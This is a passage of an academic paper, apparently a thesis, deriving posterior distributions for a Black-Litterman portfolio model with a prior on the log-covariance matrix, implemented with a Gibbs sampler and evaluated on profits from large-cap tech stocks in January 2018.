$det(\\Sigma)=\\prod_{i=1}^{n} {\\lambda_{\\Sigma}}_i=\\prod_{i=1}^{n} e^{{\\lambda_{A}}_i}=e^{Tr(A)}$. By using this in the joint distribution of the returns and by noticing that $(r_i-\\mu)^T\\Sigma^{-1}(r_i-\\mu)\\in \\mathbb{R}$ we obtain:\n\n$$\\begin{gathered}\nf(r_1,...,r_m|\\mu,\\Sigma)=(2\\pi)^{-\\frac{mn}{2}} exp \\left \\{-\\frac{1}{2} Tr \\left( \\sum_{i=1}^{m} (r_i-\\mu)^T\\Sigma^{-1}(r_i-\\mu) \\right) \\right \\} \\\\\nexp \\left\\{ -\\frac{m}{2} Tr(A) \\right\\}= (2\\pi)^{-\\frac{mn}{2}} exp \\left \\{-\\frac{1}{2} Tr \\left( \\sum_{i=1}^{m} (r_i-\\mu)(r_i-\\mu)^T\\Sigma^{-1} \\right) \\right \\}\\\\\nexp \\left\\{ -\\frac{m}{2} Tr(A) \\right\\}=(2\\pi)^{-\\frac{mn}{2}} exp \\left \\{-\\frac{m}{2} Tr \\left(A+ Se^{-A} \\right) \\right \\}\\end{gathered}$$\n\nHere, $S=\\frac{1}{m}\\sum_{i=1}^{m} (r_i-\\mu)^T\\Sigma^{-1}(r_i-\\mu)$. Before we continue, let us define an operator and make a few notations.", "\n\nLet $A$ be a $n\\times n$ matrix, $A=(a_{ij})_{i,j=\\overline{1,n}}$, then we define an operator that stacks in a vector the entries parallel to the main diagonal: $$\\begin{gathered}\nVec^*(A)=\n\\begin{bmatrix}\na_{11} & a_{22} & ... &a_{nn}|& a_{12} & a_{23} &...&a_{n-1n}|...|a_{1n}\n\\end{bmatrix}^T\\end{gathered}$$\n\nWe notice that if $A$ is $n\\times n$, $Vec^*(A)$ is $\\frac{n(n+1)}{2}\\times 1$. This definition brings us to the following notations:\n\n\\[notation 1\\] $$\\begin{gathered}\n\\lambda=Vec^*(log(S)), \\alpha=Vec^*(log(\\Sigma)) \\\\\n\\Lambda=log(S), A=log(\\Sigma), d=\\frac{n(n+1)}{2}\\end{gathered}$$\n\nThe idea that Leonard and Hsu had was to approximate $f(r_1,...,r_m|\\mu,\\Sigma)$ by approximating $e^{-A}$. The approximation makes use of the fact that $X(\\omega)=e^{-A\\omega}$ satisfies a Volterra integral equation[@bellman1970]: $$\\begin{gathered}\nX(t)={S}^{-t}-\\int_{0}^{t}S^{s-t}(A-\\Lambda)X(v)dv, 0<t<\\infty, \\end{gathered}$$ By letting $t=1$, by iterative substitution of $X(v)$ and by using the spectral decomposition of matrix $S$ we obtain that the approximation is (please see Appendix \\[approx proof\\] for the proof):\n\n$$\\begin{gathered}\n \\label{approx dist}\nf^*(r_1,...,r_m|\\alpha)=(2\\pi e)^{-\\frac{mn}{2}}det(S)^{-\\frac{m}{2}} exp \\left\\{ -\\frac{1}{2} (\\alpha-\\lambda)^T Q (\\alpha-\\lambda) \\right\\}\\end{gathered}$$\n\nIn order to see how to compute $Q$, we first have to introduce a couple more notations. ", "If we let $e_i,d_i$ to be the $i^{th}$ normalized eigenvector with its corresponding eigenvalue, respectively, then $f_{ij}$ is obtained by looking at the equation $Vec^*(log(\\Sigma))^T f_{ij}=e_i^T log(\\Sigma) e_j$ and identifying the coefficients of the entries in the $log(\\Sigma)$ matrix. ", "With those $f_{ij}$, we can finally compute $Q$: $$\\begin{gathered}\n\\xi_{ij}=\\frac{(d_i-d_j)^2}{d_id_j(log(d_i)-log(d_j))^2} \\\\\nQ=\\frac{m}{2}\\sum_{i=1}^{n} f_{ii}f_{ii}^T+m\\sum_{i<j}^{n} \\xi_{ij}f_{ij}f_{ij}^T\\end{gathered}$$\n\nThe approximate distribution is: $\\alpha|r_1,...,r_m \\approx\\sim N(\\lambda,Q^{-1})$\n\nNow we are ready to move on to the next section and resent the assumptions of the model.", "\n\nThe Model\n---------\n\nAs mentioned in the previous section, we will have a prior on the $log(\\Sigma)$. But how would one construct an intuitive distribution? ", "The simplest distribution that one could work with is the multivariate normal, in which the variance terms on the main diagonal have a mean $\\theta_1$ and a variance $\\sigma_1^2$ and the covariance terms, which are on the off diagonal, have another mean $\\theta_2$ and another variance $\\sigma_2^2$. Hence, we arrive at the following model: $$\\label{ass2.1}\nr_1,...,r_m|\\mu,\\Sigma\\sim N(\\mu,\\Sigma)$$ $$\\label{ass2.2}\nP\\mu\\sim N(q,\\Omega)$$ $$\\label{ass2.3}\n\\alpha|\\theta,\\Delta=Vec^*(log(\\Sigma))|\\theta,\\Delta\\sim N(J\\theta,\\Delta)$$ Where we have the following notations:\n\n$$\\begin{gathered}\nJ=\\begin{bmatrix}\n1&0\\\\\n:&:\\\\\n1&0\\\\\n0&1\\\\\n:&:\\\\\n0&1\n\\end{bmatrix},\n\\Delta=\\begin{bmatrix}\n\\sigma_1^2 I_n & \\mathbb{O} \\\\\n\\mathbb{O} & \\sigma_2^2 I_{d-n}\n\\end{bmatrix}, \n\\theta=\\begin{bmatrix}\n\\theta_1\\\\\n\\theta_2\n\\end{bmatrix}\\end{gathered}$$\n\nDerivation of Posterior Distributions\n-------------------------------------\n\nIf we let $\\theta$ to have a uniform prior ($\\theta\\propto 1$) by integrating it out from the density in equation (\\[ass2.3\\]), we obtain:\n\n\\[integral proposition\\] $$\\begin{gathered}\nf(\\alpha|\\sigma_1^2,\\sigma_2^2)=\\int_\\theta det(\\Delta)^{-\\frac{1}{2}}exp\\left\\lbrace -\\frac{1}{2}(\\alpha-J\\theta)^T \\Delta^{-1}(\\alpha-J\\theta) \\right\\rbrace d\\theta=\\\\\n=2\\pi det(\\Delta)^{-\\frac{1}{2}}det(J^T\\Delta^{-1}J)^{-\\frac{1}{2}}exp \\left\\lbrace -\\frac{1}{2}\\alpha^TG\\alpha \\right\\rbrace \\text{, where} \\\\\nG=\\left(I_d-J(J^T\\Delta^{-1}J)^{-1}J^T\\Delta^{-1}\\right)^T\\Delta^{-1}\\left(I_d-J(J^T\\Delta^{-1}J)^{-1}J^T\\Delta^{-1}\\right)\\end{gathered}$$\n\nFor the proof, please see the Appendix \\[integral proof\\].", "\n\nNow, by using this distribution together with the approximation obtained from the Volterra integral of the distribution of returns denoted by equation (\\[approx dist\\]) and with the prior on $P\\mu$ represented by equations (\\[ass2.2\\]), we can finally obtain the approximate joint distribution: $$\\label{joint dist for log}\n\\begin{aligned} \nf(\\alpha,\\mu,\\sigma_1^2,\\sigma_2^2,r_1,...,r_m)\\approx\\propto det(\\Delta)^{-\\frac{1}{2}}det(J^T\\Delta^{-1}J)^{-\\frac{1}{2}}exp \\left\\lbrace -\\frac{1}{2}\\alpha^TG\\alpha \\right\\rbrace \\cdot\\\\\n\\cdot det(S)^{-\\frac{m}{2}}exp \\left\\{ -\\frac{1}{2} (\\alpha-\\lambda)^T Q (\\alpha-\\lambda) \\right\\}\\cdot\\\\\n\\cdot det(\\Omega)^{-\\frac{1}{2}} exp \\left\\{ -\\frac{1}{2} (P\\mu-q)^T\\Omega^{-1} (P\\mu-q)\\right\\}\n\\end{aligned}$$\n\nWe will first proceed with finding the posterior of $\\alpha$. Hence, we have to collect all the terms depending on $\\alpha$. Since one of those is the approximation obtained from the Volterra integral, the posterior is going to be an approximate distribution: $$\\begin{gathered}\nf^*(\\alpha|r_1,...,r_m,\\sigma_1^2,\\sigma_2^2,\\mu)\\approx\\propto exp \\left\\lbrace -\\frac{1}{2}\\left(\\alpha^TG\\alpha + (\\alpha-\\lambda)^T Q (\\alpha-\\lambda) \\right) \\right\\rbrace\\end{gathered}$$ We can apply **Lemma \\[lemma2\\] (Completing the square)** with $y=\\alpha, a=0,A=G,b=\\lambda,B=Q$ and we obtain that:\n\n$$\\begin{gathered}\n\\boxed{\n\\alpha|r_1,...,r_m,\\sigma_1^2,\\sigma_2^2,\\mu\\approx\\sim N(\\alpha^*,(Q+G)^{-1}) \\text{, where } \\alpha^*=(Q+G)^{-1}Q\\lambda}\\end{gathered}$$\n\nMoving to the posterior of $\\sigma_1^2,\\sigma_2^2$, we have to collect the terms depending on $\\Delta$, which also includes $G$. We note that the term obtained from the Volterra integral approximation of the matrix exponential does not show up in this posterior. ", "Hence, this will be an exact distribution: $$\\begin{gathered}\nf(\\sigma_1^2,\\sigma_2^2|\\alpha,\\mu,r_1,...,r_m)\\propto det(\\Delta)^{-\\frac{1}{2}}det(J^T\\Delta^{-1}J)^{-\\frac{1}{2}}exp \\left\\lbrace -\\frac{1}{2}\\alpha^TG\\alpha \\right\\rbrace\\end{gathered}$$\n\nHowever, one can write the above distribution in scalar form. ", "By applying **Lemma \\[determinants identity\\]** which can be found in **Appendix \\[integral proof\\]**, one finds that the joint posterior distribution of $\\sigma_1^2,\\sigma_2^2$ is equal to: $$\\begin{gathered}\nf(\\sigma_1^2,\\sigma_2^2|\\alpha,\\mu,r_1,...,r_m)\\propto \\left( \\sigma_1^2 \\right)^{-\\frac{n-1}{2}}\\left( \\sigma_2^2 \\right)^{-\\frac{d-n-1}{2}} exp \\left\\lbrace -\\frac{1}{2}\\alpha^TG\\alpha \\right\\rbrace\\end{gathered}$$\n\nFurthermore, by applying **Lemma \\[exponential identity\\]** which can also be found in **Appendix \\[integral proof\\]**, we obtain that the scalar version for the equation is: $$\\begin{gathered}\nf(\\sigma_1^2,\\sigma_2^2|\\alpha,\\mu,r_1,...,r_m)\\propto \\left( \\sigma_1^2 \\right)^{-\\frac{n-1}{2}} exp \\left\\lbrace - \\frac{1}{2\\sigma_1^2}\\sum_{i=1}^{n} (\\alpha_i-\\overline{\\alpha_v})^2 \\right\\rbrace \\\\ \n\\left( \\sigma_2^2 \\right)^{-\\frac{d-n-1}{2}}exp \\left\\lbrace-\\frac{1}{2\\sigma_2^2}\\sum_{i=n+1}^{d} (\\alpha_i-\\overline{\\alpha_c})^2 \\right\\rbrace\\end{gathered}$$ Here, $\\overline{\\alpha_v}$ are the averages of the log of the variance terms and $\\overline{\\alpha_c}$ are the averages of the log of the covariance terms: $$\\begin{gathered}\n\\overline{\\alpha_v}=\\frac{\\sum_{i=1}^n\\alpha_i}{n} \\text{ and } \n\\overline{\\alpha_c}=\\frac{\\sum_{i=n+1}^d\\alpha_i}{d-n}\\end{gathered}$$\n\nHence, both posteriors of $\\sigma_1^{2}$ and $\\sigma_2^{2}$ are following Inverse Gamma distributions and they are independent: $$\\begin{gathered}\n\\boxed{\n\\sigma_1^{2}|\\alpha,\\mu,r_1,...,r_m\\sim \\Gamma^{-1} \\left( \\frac{n-3}{2},\\frac{1}{2}\\sum_{i=1}^{n} (\\alpha_i-\\overline{\\alpha_v})^2 \\right)}\\\\\n\\boxed{\n\\sigma_2^{2}|\\alpha,\\mu,r_1,...,r_m\\sim \\Gamma^{-1} \\left( \\frac{d-n-3}{2},\\frac{1}{2}\\sum_{i=n+1}^{d} (\\alpha_i-\\overline{\\alpha_c})^2 \\right)}\\end{gathered}$$\n\nWe are finally ready to compute the posterior for $\\mu$ also by collecting the terms that depend on it. ", "We notice that the term obtained from the Volterra integral approximation of the matrix exponential does not show up in the posterior. ", "Therefore, like the posteriors of $\\sigma_1^2$ and $\\sigma_2^2$, this will be an exact distribution. ", "Moreover, we notice that the first two equations in the assumptions of our model (equations (\\[ass2.1\\]) and (\\[ass2.2\\])) are the same as when we used an Inverse Wishart prior. ", "Therefore, the derivation for the posterior for $\\mu$ will be the same, yielding:\n\n$$\\begin{gathered}\n\\boxed{\n\\mu|\\alpha,\\sigma_1^2,\\sigma_2^2,r_1,...,r_m \\sim N\\left(\\mu_{post}, \\Sigma_{post} \\right)} ,\\text{ where } \\\\\n\\boxed{\n\\mu_{post}=(m\\Sigma^{-1}+P^T\\Omega^{-1}P)^{-1}(m\\Sigma^{-1}\\overline{r}+P^T\\Omega^{-1}q)} \\\\\n\\boxed{\n\\Sigma_{post}=\\left( m\\Sigma^{-1}+P^T\\Omega^{-1}P \\right)^{-1}\n}\\end{gathered}$$\n\nImplementation {#implementation-1}\n--------------\n\nNow that we have derived our posteriors, we are ready to implement it, using a Gibbs Sampler. ", "The only difference from before is that we will use a Metropolis-Hastings algorithm for sampling $\\alpha$, for which we need the exact posterior distribution. ", "This will be proportional to the distribution obtained from collecting all terms with an $\\alpha$ from the joint distribution represented by equation (\\[joint dist for log\\]):\n\n$$\\begin{gathered}\nexp \\left\\lbrace -\\frac{1}{2}\\alpha^TG\\alpha \\right\\rbrace\n\\boxed{det(S)^{-\\frac{m}{2}}exp \\left\\{ -\\frac{1}{2} (\\alpha-\\lambda)^T Q (\\alpha-\\lambda) \\right\\}}\\end{gathered}$$\n\nWe have seen that it results in the posterior: $$\\begin{gathered}\n\\alpha|r_1,...,r_m,\\sigma_1^2,\\sigma_2^2,\\mu\\approx\\sim N(\\alpha^*,(Q+G)^{-1}) \\text{, where } \\alpha^*=(Q+G)^{-1}Q\\lambda \\\\\n\\pi^*(\\alpha|r_1,...,r_m,\\sigma_1^2,\\sigma_2^2,\\mu)\\approx\\propto exp \\left \\lbrace -\\frac{1}{2}(\\alpha-\\alpha^*)^T(Q+G)(\\alpha-\\alpha^*) \\right \\rbrace\\end{gathered}$$\n\nThis is an approximation since the boxed part is an approximation of the pdf of a multivariate normal using the Volterra integral equation. ", "If we replace this with the exact distribution, we would obtain: $$\\begin{gathered}\n\\pi(\\alpha|r_1,...,r_m,\\sigma_1^2,\\sigma_2^2)\\propto exp\\left\\lbrace -\\frac{m}{2} Trace\\left(A+Se^{-A}\\right)-\\frac{1}{2} \\alpha^TG\\alpha \\right\\rbrace\\end{gathered}$$\n\nThe Metropolis-Hastings step at $t^{th}$ iteration would be that we would simulate a candidate value from the approximate posterior distribution: $\\widetilde{\\alpha}\\approx\\sim N(\\alpha^*,(Q+G)^{-1})$ and we would accept it with probability $min(\\rho,1)$, where $$\\begin{gathered}\n\\rho=\\frac{\\pi\\left(\\widetilde{\\alpha}|r_1,...,r_m,{\\sigma_1^2}^{(t)},{\\sigma_2^2}^{(t)},{\\mu}^{(t)}\\right)}{\\pi\\left({\\alpha}^{(t)}|r_1,...,r_m,{\\sigma_1^2}^{(t)},{\\sigma_2^2}^{(t)},{\\mu}^{(t)}\\right)}\\cdot \\frac{\\pi^*\\left({\\alpha}^{(t)}|r_1,...,r_m,{\\sigma_1^2}^{(t)},{\\sigma_2^2}^{(t)},{\\mu}^{(t)}\\right)}{\\pi^*\\left(\\widetilde{\\alpha}|r_1,...,r_m,{\\sigma_1^2}^{(t)},{\\sigma_2^2}^{(t)},{\\mu}^{(t)}\\right)}\\end{gathered}$$\n\nIt is useful at this point to remember that because of the notation introduced in \\[notation 1\\], we have a connection between $\\pi^*$ and $\\pi$ since there is one between $A$ and $\\alpha$, namely: $$\\begin{gathered}\n\\alpha=Vec^*(A)\\end{gathered}$$\n\nUsing the Metropolis Hastings step that was just discussed, we arrive at the following Gibbs Sampler:\n\n$\\alpha^{(t+1)}=\n\\begin{cases}\n\\widetilde{\\alpha}\\sim N\\left( \\left( Q^{(t)}+G^{(t)} \\right)^{-1}Q^{(t)}\\lambda^{(t)}, \\left( Q^{(t)}+G^{(t)} \\right)^{-1}\\right) \\text{w.p. } ", "min(\\rho,1) \\\\\n\\alpha^{(t)} \\text{otherwise}\n\\end{cases}$ Since $\\alpha=Vec^*(log(\\Sigma))\\Rightarrow \\begin{cases}\n\\text{compute } \\Sigma^{(t+1)}=exp \\left\\lbrace {Vec^*}^{-1}\\left( \\alpha^{(t+1)} \\right) \\right\\rbrace \\\\\n\\text{keep } \\Sigma^{(t)}\n\\end{cases}$ $\\begin{cases}\n{\\sigma_1^2}^{(t+1)}\\sim \\Gamma^{-1} \\left( \\frac{n-3}{2},\\frac{1}{2} \\sum_{i=1}^n \\left( {\\alpha_i}^{(t+1)}-{\\overline{{\\alpha_v}^{(t+1)}}} \n\\right)^2 \\right) \\\\\n{\\sigma_2^2}^{(t+1)}\\sim \\Gamma^{-1} \\left( \\frac{d-n-3}{2},\\frac{1}{2} \\sum_{i=n+1}^d \\left( {\\alpha_i}^{(t+1)}-{\\overline{{\\alpha_c}^{(t+1)}}} \\right)^2 \\right)\n\\end{cases}\\Rightarrow$\n\n$\\Rightarrow \\Delta^{(t+1)}=\n\\begin{bmatrix}\n{\\sigma_1^2}^{(t+1)}I_n & \\mathbb{O} \\\\\n\\mathbb{O} & {\\sigma_2^2}^{(t+1)}I_{d-n}\\\\\n\\end{bmatrix}$ Let $\\Sigma_{\\mu}=\\left( m{\\Sigma^{(t+1)}}^{-1}+P^T\\Omega^{-1}P \\right)^{-1}\\Rightarrow \\mu^{(t+1)}\\sim N \\left( \\Sigma_{\\mu}\\left( m{\\Sigma^{(t+1)}}^{-1}\\overline{r}+P^T\\Omega^{-1}q \\right), \\Sigma_{\\mu}\\right)$ Compute $S^{(t+1)}=\\frac{\\sum_{i=1}^m \\left( r_i-\\mu^{(t+1)} \\right)\\left( r_i-\\mu^{(t+1)} \\right)^T}{m}$, $\\lambda^{(t+1)}=Vec^* \\left( log \\left( S^{(t+1)} \\right) \\right)$, ${d_j}^{(t+1)}$ and ${e_j}^{(t+1)}$ the eigenvalue and normalized eigenvector of $S^{(t+1)}$ respectively. ", "Compute $f_{ij}^{(t+1)}$ by identifying the coefficients of the entries of the $log\\left(\\Sigma \\right)$ matrix from the equation $Vec^*\\left( log\\left( \\Sigma^{(t)}\\right) \\right){f_{ij}}^{(t+1)}={e_i}^{(t+1)}log \\left( \\Sigma^{(t)} \\right){e_j}^{(t+1)} $ Compute $\\xi_{ij}^{(t+1)}=\\frac{({d_i}^{(t+1)}-{d_j}^{(t+1)})^2}{{d_i}^{(t+1)}{d_j}^{(t+1)}\\left(log\\left( {d_i}^{(t+1)} \\right)-log({d_j}^{(t+1)})\\right)^2}$ Compute $Q^{(t+1)}=\\frac{m}{2}\\sum_{i=1}^{n} {f_{ii}}^{(t+1)}{{f_{ii}}^{(t+1)}}^T+m\\sum_{i<j}^{n} {\\xi_{ij}}^{(t+1)}{f_{ij}}^{(t+1)}{{f_{ij}}^{(t+1)}}^T$ Compute $$\\begin{gathered}\nG^{(t+1)}=\\left(I_d-J(J^T{\\Delta^{(t+1)}}^{-1}J)^{-1}J^T{\\Delta^{(t+1)}}^{-1}\\right)^T{\\Delta^{(t+1)}}^{-1} \\cdot \\\\\n\\cdot \\left(I_d-J(J^T{\\Delta^{(t+1)}}^{-1}J)^{-1}J^T{\\Delta^{(t+1)}}^{-1}\\right)\\end{gathered}$$\n\nResults {#results}\n-------\n\nJust like we did before, in this section we will depict the sensitivity of the model to changes in confidence levels ($\\omega_i$) in terms of both the distance of the posterior to investor’s view and the profits obtained if one would use this model to trade.", "\n\nBefore we delve into the actual results for this version of the model, we notice that remarks (\\[remark 1\\]) and (\\[remark 2\\]) both hold. ", "Basically, this means that as the diagonal entries in $\\Omega$ get smaller, the more confident we are in the views because we have the assumption that $P\\mu\\sim N(q,\\Omega)$. Same assumption points out the fact that the smaller $\\Omega$ is, the closer $P\\mu$ should be to $q$. Hence, a very small $\\Omega$ shows the fact that the investor is very confident in this view and, therefore, the posterior should also be close to $q$. Therefore, the smaller our $\\Omega$ is, the closer $P\\mu_{\\text{post}}$ should be to $q$. In the first part of this section we will present some plots similar to the ones presented before. ", "We will take 2 views and do an exhaustive search over possible combinations of pairs of values for the 2 diagonal entries of $\\Omega$ (which are depicted as $2$ axis) and compute the same distance as before:$|P\\mu_{\\text{post}}-q|$ (which is depicted as $1$ axis).", "\n\nWe chose the same $4$ stocks (AAPL, AMZN, GOOG, MSFT), and we will use the same data set as when we presented the results in section \\[results P nonsqr Inv Wish\\]: daily returns from 1/2/2014 to 12/29/2017. ", "We will use the following inputs (again the columns are in order AAPL, AMZN, GOOG, MSFT and the rows represent the views): $$\\begin{gathered}\nq=\\begin{bmatrix}\n0.02\\\\\n0.05\n\\end{bmatrix},\nP=\\begin{bmatrix}\n-1 & 1 & 0 & 0\\\\\n0 & 0 & 1 & -1\\\\\n\\end{bmatrix}\\end{gathered}$$\n\nJust like when we had a $P$ non-square and an Inverse Wishart prior, in this version of the model, one can use smaller confidence levels than when we were just using an Inverse Wishart prior and the augmented matrix $P$. This time one can choose $\\omega_i$ (which were defined as the entries in the main diagonal of $\\Omega$) of the order $10^{-7}$ without getting any numerical issues. ", "For the results presented here, we let $(\\omega_1,\\omega_2)$ range between $10^{-6}$ to $10^{-4}$.\n\nHowever, one can imagine that this approach is more computationally expensive than just having an Inverse Wishart prior on $\\Sigma$. Therefore, the exhaustive search was run in parallel on multiple cores (each core running the Gibbs Sampler for $1$ pair $(\\omega_1,\\omega_2)$) and the range itself was split into 4 ranges: $$\\begin{gathered}\n(\\omega_1,\\omega_2)\\in \\begin{cases}\n\\left( 10^{-6}\\rightarrow 10^{-5},10^{-6}\\rightarrow 10^{-5} \\right)\\\\\n\\left( 10^{-5}\\rightarrow 10^{-4},10^{-5}\\rightarrow 10^{-4} \\right)\\\\\n\\left( 10^{-6}\\rightarrow 10^{-5},10^{-5}\\rightarrow 10^{-4} \\right)\\\\\n\\left( 10^{-5}\\rightarrow 10^{-4},10^{-6}\\rightarrow 10^{-5} \\right)\n\\end{cases}\\end{gathered}$$ Each one of those ranges was split into an equally spaced grid of $4^2$ points, each one of those being ran on $1$ core.", "\n\nThe burn period was set to $10^{3}$ and the iterations to $10^{4}$. Albeit those seem relatively small, convergence is actually achieved very fast when $\\omega_i$ are small.", "\n\n![", "Distances for $log(\\Sigma)$ prior](V2_Log_Cov_sim_o1,o2_AMZN_distance_rerun_Gibbs_q_2,5_detailed){width=\"\\textwidth\"}\n\nWe notice that in this version of the model, the distance converges to $0$ very fast as o1 ($\\omega_1$ in the model) and o2 ($\\omega_2$ in the model) go to $0$. Also, we notice that as o1 and o2 get bigger, it converges very fast to a stabilizing distance. ", "This is consistent with our intuition since if we are very confident in our views, the model should put a lot more importance on them, while if we are not confident at all in our views, the model should just take into consideration the history. ", "Indeed, if we use only the history, the unbiased estimator for $\\mu$ is the sample mean of the returns ($\\overline{r}$) and therefore the distance becomes $|P\\overline{r}-q|=0.05388875$.\n\nWe also notice that the second view (corresponding to $o2$) has more influence on the posterior than the first view. ", "This is because the $3D$ curve would leave a $2D$ line on a section parallel to the “o2 vs distance” plane that converges to $0$ as o2 gets very small much faster than a section parallel to the “o1 vs distance” plane would when o1 gets very small.", "\n\nWe will proceed by looking at profits (losses) that we would obtain by using this model trained on the same daily returns between 1/2/2014 and 12/29/2017. ", "We would estimate using Gibbs Sampling the posterior mean ($\\mu_{post}$) and the posterior covariance ($\\Sigma_{post}$) and we use the CAPM equation (\\[eq capm\\]) to obtain the weights to be $w=\\frac{1}{2.5}{\\Sigma_{post}}^{-1}\\mu_{post}$. With those weights we compute the profits that we would obtain over the month January 2018 (just like before, daily returns between 1/2/2018 and 1/30/2018) with an initial investment of $100,000\\$$. Here, one could use a different investment horizon also.", "\n\nThe same $P$, $q$, grid for $\\omega_i$, burn period, iteration period were used as before. ", "The following is a $3D$ plot of the sensitivity of the profits to changes in confidence:\n\n![", "Profits with AMZN in and $q={[0.02,0.05]}^T$[]{data-label=\"fig:figure 6\"}](V2_Log_Cov_sim_o1,o2_AMZN_profit_rerun_Gibbs_q_2,5_detailed){width=\"\\textwidth\"}\n\nWe observe a profit that is approximately between $10,000\\$$ and $58,000\\$$. In order to interpret this curve, we would have to know what actually happened in the month of January 2018 using the views inputted. ", "More specifically, over the month of January 2018, $Pr_{\\text{Jan2018}}=\\begin{bmatrix}\n0.23996743\\\\\n0.01366718\n\\end{bmatrix}$. Albeit the inputted $1^{st}$ view is a $10^{th}$ of what happened in reality (AMZN outperformed AAPL by almost $24\\%$ in January $2018$), the model puts a higher importance on it than on the $2^{nd}$ view. ", "Indeed, the profits increase drastically as we decrease $\\omega_1$ and keep $\\omega_2$ constant. ", "Profits do not increase much as we decrease $\\omega_2$ and keep $\\omega_1$ constant.", "\n\nJust like we did before, since a $24\\%$ gain on AAPL in a month is an extreme scenario, let us consider a different stock instead of AMZN. ", "We will replace AMZN with FB (Facebook) and we will keep all the inputs the same as before, except that we will vary $q$. In the following $3$ figures we will present the results for profits when the investor considers $q=\\begin{bmatrix}\n0.02\\\\\n0.05\n\\end{bmatrix}$, $q=\\begin{bmatrix}\n0.06212815\\\\\n0.01366718\n\\end{bmatrix}$ which is exactly what happened during the month of January 2018 (the “well informed” investor) and $q=\\begin{bmatrix}\n-0.06212815\\\\\n-0.01366718\n\\end{bmatrix}$ which is exactly the opposite of what happened during the month of January 2018 (the “poorly informed” investor):\n\n![", "Profits FB instead of AMZN and view opposite of reality[]{data-label=\"fig:figure 9\"}](V2_Log_Cov_sim_o1,o2_FB_profit_rerun_Gibbs_q_2,5_detailed){width=\"\\textwidth\"}\n\n![", "Profits FB instead of AMZN and view opposite of reality[]{data-label=\"fig:figure 9\"}](V2_Log_Cov_sim_o1,o2_FB_profit_rerun_Gibbs_q_real_detailed){width=\"\\textwidth\"}\n\n![", "Profits FB instead of AMZN and view opposite of reality[]{data-label=\"fig:figure 9\"}](V2_Log_Cov_sim_o1,o2_FB_profit_rerun_Gibbs_-q_real_detailed){width=\"\\textwidth\"}\n\n- Since $Pr_{\\text{Jan2018}}=\\begin{bmatrix}\n 0.06212815\\\\\n 0.01366718\n \\end{bmatrix}$, the view in which $q=\\begin{bmatrix}\n 0.02\\\\\n 0.05\n \\end{bmatrix}$ has returns that are much closer to what happened in reality than when we had AMZN instead of FB (especially the first view is closer). ", "We notice that the second view has a greater influence on the profits than what we have seen in figure \\[fig:figure 6\\] and this can be clearly noticed in figure \\[fig:figure 7\\] from above.", "\n\n- If the investor has a view exactly like the reality (figure \\[fig:figure 8\\]), the first view has more influence on the profits as $\\omega_1$ gets smaller and smaller.", "\n\n- Moreover, if we compare figures \\[fig:figure 8\\] and \\[fig:figure 9\\], we notice that they seem to be a reflection of each other with respect to a plane parallel to the “o1 vs o2” plane. ", "This would make sense since the only difference between the two is that in figure \\[fig:figure 8\\] we have a $q=\\begin{bmatrix}\n 0.06212815\\\\\n 0.01366718\n \\end{bmatrix}$ and in figure \\[fig:figure 9\\] we have a $q=-\\begin{bmatrix}\n 0.06212815\\\\\n 0.01366718\n \\end{bmatrix}$.\n\nLimitations\n-----------\n\nIn the previous section, we haven’t presented any results for the whole $S\\&P500$. This is because we have encountered both memory allocation and running time problems. ", "Both arise from the size of the matrices which makes all matrix computations and sampling from multivariate distributions time consuming. ", "The biggest issue is with the construction of the matrix $Q$. We remind ourselves that we have to compute $f_{ij}$ by looking at the equation $Vec^*(log(\\Sigma))^T f_{ij}=e_i^T log(\\Sigma) e_j$ and identifying the coefficients of the entries in the $log(\\Sigma)$ matrix. ", "With those $f_{ij}$, we can finally compute $Q$: $$\\begin{gathered}\n\\xi_{ij}=\\frac{(d_i-d_j)^2}{d_id_j(log(d_i)-log(d_j))^2} \\\\\nQ=\\frac{m}{2}\\sum_{i=1}^{n} f_{ii}f_{ii}^T+m\\sum_{i<j}^{n} \\xi_{ij}f_{ij}f_{ij}^T\\end{gathered}$$\n\nIt is easy to compute $\\xi_{ij}$ and the elegant way to compute the $f's$ is by coding a $4$ way tensor and applying the function $Vec^*(\\cdot)$ to $2$ of its entries (one can see the pattern more easily by taking a small dimensional example). ", "However, this is not the fastest way since one can actually fill out each entry in $Q$ directly. ", "In both situations, the dimensionality problem still exists. ", "When we take into consideration the whole $S\\&P 500$, the number of rows and columns are of size $d=\\frac{500\\cdot 501}{2}$, but since $Q$ is symmetric we would have to store a little more than half of the entries in $Q$ (albeit this approach makes all the formulas in the posterior a lot messier). ", "Even so, the size of such an object is approximately $53$ GB. ", "Even with the biggest server at $UCSB$, for which a node has $1$ TB of RAM memory, we could only run this in parallel on at most $20$ cores.", "\n\nThe memory allocation problem combined with a running time that is a lot bigger than just the $4$ hours that took to run the simulations presented in section \\[results P nonsqr Inv Wish\\] makes this approach computationally not feasible for a large data set.", "\n\nWe have looked at a couple of ideas to remedy the problem:\n\n- Writing the matrix $Q$ to the disk. ", "Unfortunately, one would need a high speed connection (for example SSD) to be able to write it fast enough that it doesn’t make the running time even longer. ", "This is of paramount importance since we have to compute $Q$ at each iteration of the Gibbs Sampler.", "\n\n- We have looked at parallelizing the Gibbs Sampler itself (which is a Markov Chain). ", "More precisely, in the general setting of Markov Chains, we have looked at independently starting at $m$ initial points and, from each initial point, starting independent Markov Chains. ", "It has been shown[@baum1962] that for one single Markov Chain that satisfies Doob’s conditions, the ergodic average converges geometrically: $$\\begin{gathered}\n P\\left(\\frac{1}{n} \\sum_{k=1}^n f(X_k)>\\epsilon\\Big|X_0=x_0 \\right)\\leq A(\\epsilon)\\rho(\\epsilon)^n \\text{ ,where}\\\\\n (\\exists) d_0,t_0 \\text{ s.t. } ", "\\rho(\\epsilon)=\\Phi(d_0,t_0)^{\\frac{1}{d_0}}+\\eta \\text{ with } \\eta \\text{ s.t. } ", "\\rho(\\epsilon)<1, \\\\ \\Phi(d_0,t_0)=\\sup_{x_0} E \\left[ e^{t_0{\\sum_{k=1}^{d_0}}f(X_k)}\\Big|x_0 \\right]\\end{gathered}$$ By using this result, one can easily show that for running $m$ Markov Chains in parallel we obtain the following bound: $$\\begin{gathered}\n P \\left( \\frac{1}{m} \\sum_{i=1}^m \\frac{1}{n} \\sum_{k=1}^n f(X_{ik})> \\epsilon \\Big|x_0 \\right)\\leq e^{-{t_0}^* mn\\epsilon}{A^*(\\epsilon)}^m{\\rho^*(\\epsilon)}^{mn}\\end{gathered}$$ Here, the existence of ${d_0}^*,{t_0}^*$ and the definitions of $A^*(\\cdot),\\rho^*(\\cdot)$ are in the same way as before. ", "The problem is that we cannot compare the right hand sides of the $2$ inequalities from above because the $A(\\cdot), A^*(\\cdot)$ and $\\rho(\\cdot), \\rho^*(\\cdot)$ are different since this is a proof of existence.", 